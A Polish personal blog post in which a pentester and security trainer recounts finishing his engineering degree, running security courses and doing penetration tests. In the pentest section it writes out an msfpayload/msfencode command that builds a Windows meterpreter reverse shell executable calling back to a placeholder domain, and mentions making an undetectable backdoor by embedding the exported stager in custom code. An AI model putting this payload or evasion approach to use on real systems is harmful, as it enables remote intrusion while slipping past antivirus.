Po długim czasie nie publikowania postów na blogu czas odwrócić tą tendencje, chociaż jak będzie czas pokaże ;).
Patrząc na datę poprzedniego wpisu uświadomiłem sobie, że to już praktycznie rok od nie-postowania o_0: Co tak absorbowało mnie przez ostatnie miesiące ?
{ Uczelnia }
Do lipca tego roku byłem studentem Pwr, BYŁEM, ponieważ we wspomnianym przed chwilą miesiącu uzyskałem jakże upragniony,wyczekiwany,niesamowity,przecudowny, zmieniający moje życie tytuł inżyniera. tak tak inż. Icewall 😉 [szczerze, to do dnia dzisiejszego jeszcze nie odebrałem dyplomu :P, także jak widać bardzo się dotychczas przydaje:P]. Jeżeli chodzi o wpływ uczelni na mój czas od lutego do lipca to był on dość znaczący. Pomimo przeróżnych kursów od eksploracji danych po rozproszone systemy do zrealizowania było ZPI(Zespołowe przedsięwzięcie inżynierskie). Temat pracy: “Lokalizacja pozycji przy pomocy urządzeń mobilnych z wbudowanym GPS.”. Temat okazał się bardziej wymagający niż to się na początku mogło wydawać ( jak to zwykle bywa;) ), nie ze względu na logiczny poziom skomplikowania, ale raczej na mnogość nowych wtedy dla nas technologi, na które się zdecydowaliśmy: WCF, klient na Android’a, klient na Windows Mobile, spięcie tego w całość + masa innych technologi. To wszystko w połączeniu z tworzeniem materiałów na szkolenia, sukcesywnym ich upgrade’owaniu, prowadzeniu szkoleń po całej Polsce dało mi zajęcie na 24/7 ;).
{ Szkolenia }
Jeżeli chodzi o szkolenia to mija już praktycznie rok od podpisania umowy z Compendium CE i niewiele poniżej jeżeli chodzi o współprace z niebezpiecznikiem.
Cały ten okres współpracy mogę podsumować śmiało bardzo pozytywnie zarówno ze strony organizacyjnej jak i wrażeń jakich dostarczają mi “studenci” na szkoleniach ;). Myślę, że dzięki specyficznym tematyką szkoleń, które prowadzę nie zdarzają się ludzie z przypadku, wepchnięci “bo szef kazał” co mnie zdecydowanie cieszy. Pisząc ten fragment odnośnie szkoleń pomyślałem o jednej kwestii:
Jeżeli, ktoś byłby zainteresowany tematem tego jak wygląda prowadzenie szkolenia od kuchni lub rozmyśla czy rozmyślał o rozpoczęciu podobnej ścieżki w swojej karierze to z chęcią udzielę odpowiedzi. Pytania można zadawać w komentarzach lub mailowo. Jeżeli będzie ich wystarczająco dużo, a zadający zezwolą na ich publikacje to myślę, że śmiało będę w stanie kliknąć na ten temat jeden z kolejnych postów.
{ Pentesty }
Jako, że w ostatnim czasie zlecenia z Hispasec dotyczą głównie pentestów czy prowadzenia prelekcji online, to nie bardzo byłem w stanie dzieli się detalami z tych akcji ;). ALE….
Co jakiś czas podczas pentestu wpada mi do głowy pomysł zautomatyzowania pewnych działań, i tak np. zrodziła się idea naklikania modułu do metasploit’a : vhost_finder, o którym mam zamiar napisać następny post. Kolejną interesującą kwestią było stworzenie na potrzeby jednego z pentestów nie wykrywalnego backdoor’a. Oczywiście można tworzyć koło od nowa, ale trudno będzie uzyskać lepszą funkcjonalność niż ta która dostarcza meterpreter wraz z metasploit’em. Na chwile obecną proste utworzenie exe’ka poprzez
ruby msfpayload windows/meterpreter/reverse_tcp_dns LHOST=your.domain.com LPORT=1337 R | ruby msfencode -c 10 -o msf.exe -t exe nie zadziała z prostych przyczyn ;). Jednak okazuje się, że prosty export stager’a i odpalenie go we własnym kodzie załatwia sprawę ;).
Jeżeli chodzi o inne badania nad którymi pracowałem/obecnie pracuje to nie będę wiele zdradzał, jedno z nich opisuje ten screenshot:
so stay tuned ;).